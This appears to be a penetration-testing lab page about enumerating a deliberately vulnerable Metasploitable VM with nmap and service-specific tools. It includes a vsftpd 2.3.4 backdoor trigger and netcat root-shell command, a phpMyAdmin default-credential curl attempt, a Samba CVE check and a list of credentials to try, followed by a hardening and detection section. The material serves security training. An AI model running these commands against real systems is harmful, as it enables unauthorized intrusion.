← All labs
MediumEnumeration ~35 min

Service Enumeration to Foothold

Enumerate an unknown box's services with nmap and targeted tools, identify the weak point, and plan the exploit.

↳ Based on the lesson: Scanning & Enumeration

Legal Use Only

Port scanning and service enumeration must only be performed on systems you own or have explicit written authorization to test. Scanning hosts on shared networks, ISP networks, or the public internet without authorization violates computer fraud laws in most jurisdictions. This lab targets Metasploitable 2 or a similar intentionally vulnerable VM on a private, isolated host-only network.

There's a box on your lab network. You know its IP and nothing else. Your job is to find out everything the machine is willing to tell you before you ever touch an exploit.

Scenario

You've been handed an IP address - 192.168.56.101 - and told it's in scope for a full internal penetration test. No documentation, no prior knowledge. Start from zero: discover which ports are open, identify the services and versions running on each, fingerprint the operating system, and determine which service is the weakest link. By the end, you'll have a prioritized list of attack paths.

Setup - target VM:

# Option A: Metasploitable 2 (the classic vulnerable lab VM)
# Download from SourceForge, import into VirtualBox or VMware
# Set the network adapter to Host-Only
# Default credentials: msfadmin / msfadmin (don't use these yet - enumerate first)
 
# Option B: Metasploitable 3 (more modern)
$ vagrant box add rapid7/metasploitable3-ub1404
$ vagrant init rapid7/metasploitable3-ub1404 && vagrant up
 
# Option C: Any HackTheBox or TryHackMe "Easy" machine
# (Use their VPN, they authorize enumeration within their platform)
 
# Verify target is reachable before starting:
$ ping -c 3 192.168.56.101

Your Objective

  1. Discover all open TCP ports on the target (full port range)
  2. Identify service names and version strings for each open port
  3. Fingerprint the operating system
  4. Run targeted enumeration tools against high-value services (FTP, SSH, HTTP, SMB)
  5. Identify the most likely initial access vector and document your attack plan

Hints

Hint 1 - scan strategy: fast then deep

A full-port scan (-p-) takes time but catches services on non-standard ports. The efficient workflow is: quick SYN scan first to find open ports fast, then a version-detection scan (-sV) only against the ports you found. Scanning all 65535 ports with -sV takes much longer than needed.

Hint 2 - nmap scripts for each service

nmap's -sC flag runs the default script set, which includes banners, version checks, and common vulnerability probes. For a specific service, use --script with a category or script name. nmap --script vuln runs all vulnerability-detection scripts - noisy but thorough on a lab box.

Hint 3 - targeted tools beat generic scanners

Once nmap tells you what's running, switch to service-specific tools: enum4linux for SMB/NetBIOS, nikto for HTTP, hydra for brute-forcing auth services, ftp command for anonymous FTP, ssh-audit for SSH configuration weaknesses. Each tool has context nmap lacks.

Walkthrough

Step 1: Fast TCP port discovery

Start with a quick SYN scan across all 65535 ports to find every open port without waiting for version detection:

kali@vr4cs: ~

Save that port list - you'll pass it to the version scan next.

Step 2: Version and OS detection on discovered ports

Run deep detection only against the ports you found:

kali@vr4cs: ~

Key findings from version output:

21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 4.7p1 Debian 8ubuntu1
23/tcp  open  telnet   Linux telnetd
80/tcp  open  http     Apache httpd 2.2.8 (Ubuntu DAV/2)
139/tcp open  netbios  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios  Samba smbd 3.0.20-Debian
3306/tcp open mysql    MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0-8.3.7

vsftpd 2.3.4 and Samba 3.0.20 both have well-known remote code execution vulnerabilities - note these immediately.

Step 3: FTP enumeration - anonymous login and vsftpd backdoor
kali@vr4cs: ~

Note the vsftpd version: 2.3.4. This version contains a backdoor planted by an attacker who compromised the vsftpd distribution server in 2011. Sending :) in the username triggers it:

# vsftpd 2.3.4 backdoor - opens a shell on port 6200
$ nmap --script ftp-vsftpd-backdoor 192.168.56.101 -p 21
# If vulnerable: PORT 6200/tcp open  shell
$ nc 192.168.56.101 6200
# You now have a root shell
Step 4: SMB enumeration with enum4linux
kali@vr4cs: ~

The tmp share comment "oh noes!" is a hint - it's an open writable share. Samba 3.0.20 is also vulnerable to CVE-2007-2447 (username map script), a remote command injection that gives root.

# Test Samba usermap_script vulnerability (CVE-2007-2447)
$ nmap --script smb-vuln-cve2007-2447 -p 445 192.168.56.101
Step 5: HTTP enumeration with nikto and directory busting
kali@vr4cs: ~

Check for default credentials immediately on any admin panel found:

# Try phpMyAdmin default credentials
$ curl -s -c phpma.cookies -d "pma_username=root&pma_password=&server=1" \
  http://192.168.56.101/phpMyAdmin/ | grep -i "welcome\|error"
Step 6: Build the attack surface map

Summarize your findings into a prioritized target list:

# High confidence, known RCE:
# - vsftpd 2.3.4 (port 21)     - backdoor, triggers root shell on port 6200
# - Samba 3.0.20 (port 445)    - CVE-2007-2447, username map script RCE → root
# - Apache Tomcat 5.5 (8180)   - default manager creds, WAR file deployment
 
# High confidence, credential attacks:
# - MySQL 5.0 (port 3306)      - try root with empty password
# - PostgreSQL 8.3 (port 5432) - try postgres/postgres
# - VNC (port 5900)            - try empty password
# - Telnet (port 23)           - unencrypted, try msfadmin/msfadmin
 
# Good but slower paths:
# - SSH (port 22) OpenSSH 4.7  - outdated, check for weak creds
# - Web apps (port 80)         - DVWA/Mutillidae provide more SQLi/XSS practice

Solution

The efficient enumeration workflow:

# 1. Fast full-port discovery
sudo nmap -sS -p- --min-rate 5000 -T4 TARGET -oN ports.txt
 
# 2. Deep version+OS+scripts on discovered ports only
ports=$(grep "^[0-9]" ports.txt | cut -d/ -f1 | tr '\n' ',' | sed 's/,$//')
sudo nmap -sV -sC -O -p$ports TARGET -oN versions.txt
 
# 3. Service-specific tools for key ports
ftp TARGET                                    # anonymous login test
enum4linux -a TARGET                          # SMB/NetBIOS deep dive
nikto -h http://TARGET                        # web vulnerability scan
gobuster dir -u http://TARGET -w WORDLIST     # directory busting
 
# 4. Quick vulnerability scan
sudo nmap --script vuln -p21,445,8180 TARGET  # targeted vuln scripts

Top initial access path: vsftpd 2.3.4 backdoor (port 21) → sends :) in username → shell spawns on port 6200 → root access without credentials. The entire exploit fits in two commands.

Key principle: Enumeration is the multiplier. Ten minutes of thorough service fingerprinting reveals multiple distinct paths to compromise - a real attacker picks the easiest one. The vsftpd backdoor and Samba usermap_script vulnerability each give root in under a minute once identified.

Defend It

Remediation priorities from this scan

A box with this attack surface would never be on a production network, but the findings map directly to real hardening checklists.

Critical remediations in priority order:

# 1. Patch and update everything
#    vsftpd 2.3.4, Samba 3.0.20, OpenSSH 4.7 - all years past end-of-life
#    $ apt-get update && apt-get upgrade
 
# 2. Disable services you don't need
#    Telnet, rsh/rexec (512-514), rpcbind, IRC - all plaintext or legacy
#    $ systemctl disable telnet rsh rexec rpcbind inspircd
#    $ systemctl stop telnet rsh rexec rpcbind inspircd
 
# 3. Close the firewall to everything except required ports
#    $ ufw default deny incoming
#    $ ufw allow 22/tcp   # SSH only for admin access
#    $ ufw allow 443/tcp  # HTTPS for web apps
#    $ ufw enable
 
# 4. Remove or secure default credentials everywhere
#    MySQL: ALTER USER 'root'@'localhost' IDENTIFIED BY 'strongpassword';
#    PostgreSQL: change postgres user password
#    phpMyAdmin: restrict to localhost only, require strong auth
 
# 5. Change authentication method for SSH
#    Disable password auth, require key-based auth only
#    In /etc/ssh/sshd_config: PasswordAuthentication no

Detection: A scan like this generates significant traffic. Network intrusion detection systems (Snort, Zeek) will alert on nmap's fingerprinting probes. In a real engagement, coordinate with the blue team and agree on whether to scan with source IP whitelisting or full noise to test detection capabilities.